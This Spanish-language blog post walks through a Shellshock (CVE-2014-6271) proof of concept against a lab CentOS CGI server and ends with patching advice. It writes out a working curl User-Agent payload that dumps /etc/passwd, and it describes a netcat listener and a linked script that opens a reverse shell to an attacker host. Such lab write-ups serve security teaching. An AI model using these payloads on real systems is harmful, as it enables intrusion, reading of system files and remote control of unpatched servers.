Proof Of Concept CVE-2014-6271 Remote exploit vulnerability in bash

Shellshock

Una vulnerabilidad explotable de forma remota  ha sido descubierta el dia de ayer (2014-09-24), esta afecta específicamente a bash en Linux. La vulnerabilidad ha sido identificada por  CVE CVE-2014-6271 , también se le ha dado el seudonimo de A.K.A.  Shellshock

Esta vulnerabilidad afecta a casi todas  distribuciones de Linux:

Red Hat Enterprise Linux (versiones 4 a 7) y la distribución Fedora
CentOS (versiones 5 a 7)
Ubuntu 10.04 LTS, 12.04 LTS y 14.04 LTS
Debian

En esta caso vamos a desarrollar una prueba de concepto P.O.C. con un entorno Linux Centos 5.9

 

1.- Verificar la configuración de CGI por Apache

#vim /etc/httpd/conf/httpd.conf

Shellshock

2.- Agregar nuestro CGI POC Vulnerable

#vim /var/www/cgi-bin/test.cgi

Shellshock

3.- Verificar que el CGI funciona

Ingresamos a la URL :  http://192.168.88.226/cgi-bin/test.cgi

 

 

Shellshock

4.- Ahora vamos a explotar la vulnerabilidad desde un Kali Linux

POC Nro 1 :  Volcando Passwd del servidor remoto

#curl -A “() { foo;};echo;/bin/cat /etc/passwd” http://192.168.88.226/cgi-bin/test.cgi

 

Shellshock

POC Nro 2 : Generando un shell reverso

Para esto he escrito un pequeño script en bash 😀  publicado aquí  : http://pastebin.com/0BQRb1D2

Paso 1 : Abrimos nuestro puerto a la escucha con Netcat (#nc -lp 8080 -vvv)

shelllock

Paso 2: ejecutamos el script de la siguiente forma :  #./little-shellshock-reverse.sh localhostIP attackhostIP

shellshock

 

Volvemos a la terminal donde tenemos a la escucha el puerto con Netcat y veremos que se ha generado nuestra shell reversa

shelllock

 

PARCHES Y VECTORES

– Se recomienda desactivar cualquier script CGI

– Es posible que tambien se pueda user como vector el servicio DHCP como se muestra aquí :

https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

– Realizar la actualización urgente ,

Centos y derivados : #yum update -y bash.

Debian y Ubuntu :  #sudo apt-get update && sudo apt-get install –only-upgrade bash

 

 

 

 

 

Anuncios
Esta entrada fue publicada en Manuales y tutoriales por jroliva. Guarda el enlace permanente.

Acerca de jroliva

Juan Oliva, es un consultor de seguridad informática y telefonía IP con 10 años de experiencia en el campo . Muy involucrado en proyectos de pruebas de penetración , análisis y explotación vulnerabilidades, pruebas de ingeniería social, seguridad física, revisión de código, entre otras tareas de seguridad informática. Así mismo, desarrolla proyectos de implementación y mantenimiento de VoIP, basadas en Asterisk y Elastix, proyectos de callcenter, soluciones en la nube y hosted PBX, Aseguramiento de plataformas Linux, Windows. Ha estado trabajando para una variedad de empresas en donde ha desarrollado proyectos para el estado peruano, así como para entidades privadas, nacionales y del extranjero, cuenta con certificaciones vigentes en Ethical hacking, Linux y telefonía IP. Es instructor de cursos de Ethical Hacking y certificaciónes como Linux Professional Institute y Elastix, donde ha tenido oportunidad de realizar capacitaciones en el Perú, así como en el extranjero. Es investigador de vulnerabilidades, y creador de contenidos, que son publicados en su blog personal jroliva.wordpress.com el cual mantiene desde hace mas de 6 años.

Un pensamiento en “Proof Of Concept CVE-2014-6271 Remote exploit vulnerability in bash

  1. Hola,

    Muy buen artículo, muy al grano.

    Pero soy novato y tengo dudas:

    Si no hacemos los 3 primeros pasos(1º PoC), entonces ¿Cómo continuamos con las otras PoC?
    o sea ¿Cómo explotar la vulnerabilidad desde únicamente Kali?

    Saludos,

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s